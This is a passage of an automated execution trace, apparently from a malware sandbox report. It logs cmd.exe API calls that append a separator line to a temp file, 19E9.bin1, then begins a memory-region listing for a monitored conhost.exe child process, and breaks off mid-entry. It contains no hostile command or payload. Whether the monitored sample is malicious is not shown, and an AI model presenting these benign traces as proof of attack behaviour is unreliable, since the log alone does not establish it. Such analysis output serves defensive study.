GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0263.293] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetThreadUILanguage") returned 0x7ff977acd550 [0263.293] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.296] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0263.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x9343abfba8 | out: phkResult=0x9343abfba8*=0x0) returned 0x2 [0263.297] VirtualQuery (in: lpAddress=0x9343abfb94, lpBuffer=0x9343abfb10, dwLength=0x30 | out: lpBuffer=0x9343abfb10*(BaseAddress=0x9343abf000, AllocationBase=0x93439c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.297] VirtualQuery (in: lpAddress=0x93439c0000, lpBuffer=0x9343abfb10, dwLength=0x30 | out: lpBuffer=0x9343abfb10*(BaseAddress=0x93439c0000, AllocationBase=0x93439c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.297] VirtualQuery (in: lpAddress=0x93439c1000, lpBuffer=0x9343abfb10, dwLength=0x30 | out: lpBuffer=0x9343abfb10*(BaseAddress=0x93439c1000, AllocationBase=0x93439c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.297] VirtualQuery (in: lpAddress=0x93439c4000, lpBuffer=0x9343abfb10, dwLength=0x30 | out: lpBuffer=0x9343abfb10*(BaseAddress=0x93439c4000, AllocationBase=0x93439c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.297] VirtualQuery (in: lpAddress=0x9343ac0000, lpBuffer=0x9343abfb10, dwLength=0x30 | out: lpBuffer=0x9343abfb10*(BaseAddress=0x9343ac0000, AllocationBase=0x9343ac0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0xffffd000)) returned 0x30 [0263.297] GetConsoleOutputCP () returned 0x1b5 [0263.297] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0263.297] SetConsoleCtrlHandler (HandlerRoutine=0x7ff60d9e15d0, Add=1) returned 1 [0263.297] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.297] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1 [0263.298] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.298] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0263.298] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.298] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0263.298] _get_osfhandle (_FileHandle=0) returned 0x20 [0263.298] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0263.299] _get_osfhandle (_FileHandle=0) returned 0x20 [0263.299] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1 [0263.299] GetEnvironmentStringsW () returned 0x9343bb56b0* [0263.299] FreeEnvironmentStringsA (penv="=") returned 1 [0263.299] GetEnvironmentStringsW () returned 0x9343bb56b0* [0263.299] FreeEnvironmentStringsA (penv="=") returned 1 [0263.299] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9343abea58 | out: phkResult=0x9343abea58*=0x78) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x0, lpData=0x9343abea70*=0x1, lpcbData=0x9343abea54*=0x1000) returned 0x2 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x1, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x0, lpData=0x9343abea70*=0x1, lpcbData=0x9343abea54*=0x1000) returned 0x2 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x0, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x40, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x40, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x0, lpData=0x9343abea70*=0x40, lpcbData=0x9343abea54*=0x1000) returned 0x2 [0263.300] RegCloseKey (hKey=0x78) returned 0x0 [0263.300] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9343abea58 | out: phkResult=0x9343abea58*=0x78) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x0, lpData=0x9343abea70*=0x40, lpcbData=0x9343abea54*=0x1000) returned 0x2 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x1, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x0, lpData=0x9343abea70*=0x1, lpcbData=0x9343abea54*=0x1000) returned 0x2 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x0, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x9, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x4, lpData=0x9343abea70*=0x9, lpcbData=0x9343abea54*=0x4) returned 0x0 [0263.300] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9343abea50, lpData=0x9343abea70, lpcbData=0x9343abea54*=0x1000 | out: lpType=0x9343abea50*=0x0, lpData=0x9343abea70*=0x9, lpcbData=0x9343abea54*=0x1000) returned 0x2 [0263.300] RegCloseKey (hKey=0x78) returned 0x0 [0263.301] time (in: timer=0x0 | out: timer=0x0) returned 0x5be0e006 [0263.301] srand (_Seed=0x5be0e006) [0263.301] GetCommandLineW () returned="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0263.301] GetCommandLineW () returned="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0263.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.301] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9343bb7820, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0263.301] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0263.301] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0263.301] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0263.301] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0263.301] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0263.301] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0263.301] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0263.301] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0263.301] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0263.301] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0263.302] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0263.302] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0263.302] GetEnvironmentStringsW () returned 0x9343bb56b0* [0263.302] FreeEnvironmentStringsA (penv="=") returned 1 [0263.302] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.302] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0263.302] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0263.302] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0263.302] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0263.302] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0263.302] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0263.302] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0263.302] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0263.302] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0263.302] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x9343abf860 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x9343abf860, lpFilePart=0x9343abf840 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x9343abf840*="system32") returned 0x13 [0263.303] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0263.304] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x9343abf570 | out: lpFindFileData=0x9343abf570) returned 0x9343bb0720 [0263.304] FindClose (in: hFindFile=0x9343bb0720 | out: hFindFile=0x9343bb0720) returned 1 [0263.304] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x9343abf570 | out: lpFindFileData=0x9343abf570) returned 0x9343bb0720 [0263.305] FindClose (in: hFindFile=0x9343bb0720 | out: hFindFile=0x9343bb0720) returned 1 [0263.306] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0263.306] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0263.306] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0263.306] GetEnvironmentStringsW () returned 0x9343bb7a30* [0263.306] FreeEnvironmentStringsA (penv="=") returned 1 [0263.306] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.308] GetConsoleOutputCP () returned 0x1b5 [0263.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0263.308] GetUserDefaultLCID () returned 0x409 [0263.308] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff60d9fc680, cchData=8 | out: lpLCData=":") returned 2 [0263.308] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x9343abf990, cchData=128 | out: lpLCData="0") returned 2 [0263.308] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x9343abf990, cchData=128 | out: lpLCData="0") returned 2 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x9343abf990, cchData=128 | out: lpLCData="1") returned 2 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff60d9fc690, cchData=8 | out: lpLCData="/") returned 2 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff60d9fc6e0, cchData=32 | out: lpLCData="Mon") returned 4 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff60d9fc720, cchData=32 | out: lpLCData="Tue") returned 4 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff60d9fc760, cchData=32 | out: lpLCData="Wed") returned 4 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff60d9fc7a0, cchData=32 | out: lpLCData="Thu") returned 4 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff60d9fc7e0, cchData=32 | out: lpLCData="Fri") returned 4 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff60d9fc820, cchData=32 | out: lpLCData="Sat") returned 4 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff60d9fc860, cchData=32 | out: lpLCData="Sun") returned 4 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff60d9fc6a0, cchData=8 | out: lpLCData=".") returned 2 [0263.309] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff60d9fc6c0, cchData=8 | out: lpLCData=",") returned 2 [0263.309] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0263.310] GetConsoleTitleW (in: lpConsoleTitle=0x9343bb10b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.310] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0263.310] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="CopyFileExW") returned 0x7ff977ad25e0 [0263.310] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="IsDebuggerPresent") returned 0x7ff977ad1f90 [0263.311] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff975423a10 [0263.311] _wcsicmp (_String1="echo", _String2=")") returned 60 [0263.311] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0263.311] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0263.311] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0263.311] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0263.311] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0263.312] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0263.316] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.316] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.316] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.316] GetFileType (hFile=0x24) returned 0x2 [0263.316] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0263.316] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x9343abf858 | out: lpMode=0x9343abf858) returned 1 [0263.316] _dup (_FileHandle=1) returned 3 [0263.317] _close (_FileHandle=1) returned 0 [0263.317] _wcsicmp (_String1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1", _String2="con") returned -53 [0263.317] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\19e9.bin1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x9343abf7f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0263.317] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0263.317] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.317] GetFileType (hFile=0x24) returned 0x1 [0263.317] GetFileSize (in: hFile=0x24, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x84c [0263.317] SetFilePointer (in: hFile=0x24, lDistanceToMove=-1, lpDistanceToMoveHigh=0x9343abf858*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x9343abf858*=0) returned 0x84b [0263.317] ReadFile (in: hFile=0x24, lpBuffer=0x9343abf860, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9343abf868, lpOverlapped=0x0 | out: lpBuffer=0x9343abf860*, lpNumberOfBytesRead=0x9343abf868*=0x1, lpOverlapped=0x0) returned 1 [0263.317] GetConsoleTitleW (in: lpConsoleTitle=0x9343abf880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.318] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0263.318] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0263.318] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0263.318] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0263.318] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0263.318] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0263.318] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0263.318] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0263.318] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0263.318] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0263.319] _vsnwprintf (in: _Buffer=0x7ff60da00b40, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x9343abf618 | out: _Buffer="-------- \r\n") returned 11 [0263.320] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.320] GetFileType (hFile=0x24) returned 0x1 [0263.320] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="-------- \r\n", cchWideChar=-1, lpMultiByteStr=0x7ff60da04b60, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-------- \r\n", lpUsedDefaultChar=0x0) returned 12 [0263.320] WriteFile (in: hFile=0x24, lpBuffer=0x7ff60da04b60*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x9343abf5d8, lpOverlapped=0x0 | out: lpBuffer=0x7ff60da04b60*, lpNumberOfBytesWritten=0x9343abf5d8*=0xb, lpOverlapped=0x0) returned 1 [0263.320] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0263.321] _close (_FileHandle=3) returned 0 [0263.321] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.321] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0263.321] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.321] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0263.321] _get_osfhandle (_FileHandle=0) returned 0x20 [0263.321] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0263.322] SetConsoleInputExeNameW () returned 0x1 [0263.322] GetConsoleOutputCP () returned 0x1b5 [0263.322] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0263.322] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.322] exit (_Code=0) Thread: id = 230 os_tid = 0x97c Process: id = "24" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x37f5b000" os_pid = "0x468" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x198" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2618 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2619 start_va = 0x1822720000 end_va = 0x182273ffff entry_point = 0x0 region_type = private name = "private_0x0000001822720000" filename = "" Region: id = 2620 start_va = 0x1822740000 end_va = 0x1822753fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001822740000" filename = "" Region: id = 2621 start_va = 0x1822760000 end_va = 0x182279ffff entry_point = 0x0 region_type = private name = "private_0x0000001822760000" filename = "" Region: id = 2622 start_va = 0x7df5ffc10000 end_va = 0x7ff5ffc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc10000" filename = "" Region: id = 2623 start_va = 0x7ff684530000 end_va = 0x7ff684552fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff684530000" filename = "" Region: id = 2624 start_va = 0x7ff68455c000 end_va = 0x7ff68455dfff entry_point = 0x0 region_type = private name = "private_0x00007ff68455c000" filename = "" Region: id = 2625 start_va = 0x7ff68455e000 end_va = 0x7ff68455efff entry_point = 0x0 region_type = private name = "private_0x00007ff68455e000" filename = "" Region: id = 2626 start_va = 0x7ff6847f0000 end_va = 0x7ff684800fff entry_point = 0x7ff6847f0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2627 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2628 start_va = 0x18228d0000 end_va = 0x18229cffff entry_point = 0x0 region_type = private name = "private_0x00000018228d0000" filename = "" Region: id = 2629 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2630 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2631 start_va = 0x1822720000 end_va = 0x182272ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001822720000" filename = "" Region: id = 2632 start_va = 0x1822730000 end_va = 0x1822736fff entry_point = 0x0 region_type = private name = "private_0x0000001822730000" filename = "" Region: id = 2633 start_va = 0x18227a0000 end_va = 0x182285dfff entry_point = 0x18227a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2634 start_va = 0x1822860000 end_va = 0x182289ffff entry_point = 0x0 region_type = private name = "private_0x0000001822860000" filename = "" Region: id = 2635 start_va = 0x18228a0000 end_va = 0x18228a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018228a0000" filename = "" Region: id = 2636 start_va = 0x18228b0000 end_va = 0x18228b6fff entry_point = 0x0 region_type = private name = "private_0x00000018228b0000" filename = "" Region: id = 2637 start_va = 0x18228c0000 end_va = 0x18228c0fff entry_point = 0x0 region_type = private name = "private_0x00000018228c0000" filename = "" Region: id = 2638 start_va = 0x18229d0000 end_va = 0x1822b57fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018229d0000" filename = "" Region: id = 2639 start_va = 0x1822b60000 end_va = 0x1822b60fff entry_point = 0x0 region_type = private name = "private_0x0000001822b60000" filename = "" Region: id = 2640 start_va = 0x1822b70000 end_va = 0x1822b7ffff entry_point = 0x0 region_type = private name = "private_0x0000001822b70000" filename = "" Region: id = 2641 start_va = 0x1822b80000 end_va = 0x1822d00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001822b80000" filename = "" Region: id = 2642 start_va = 0x1822d10000 end_va = 0x182410ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001822d10000" filename = "" Region: id = 2643 start_va = 0x7ff684430000 end_va = 0x7ff68452ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff684430000" filename = "" Region: id = 2644 start_va = 0x7ff68455a000 end_va = 0x7ff68455bfff entry_point = 0x0 region_type = private name = "private_0x00007ff68455a000" filename = "" Region: id = 2645 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2646 start_va = 0x7ff9722f0000 end_va = 0x7ff972342fff entry_point = 0x7ff9722f0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2647 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2648 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2649 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2650 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2651 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2652 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2653 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = 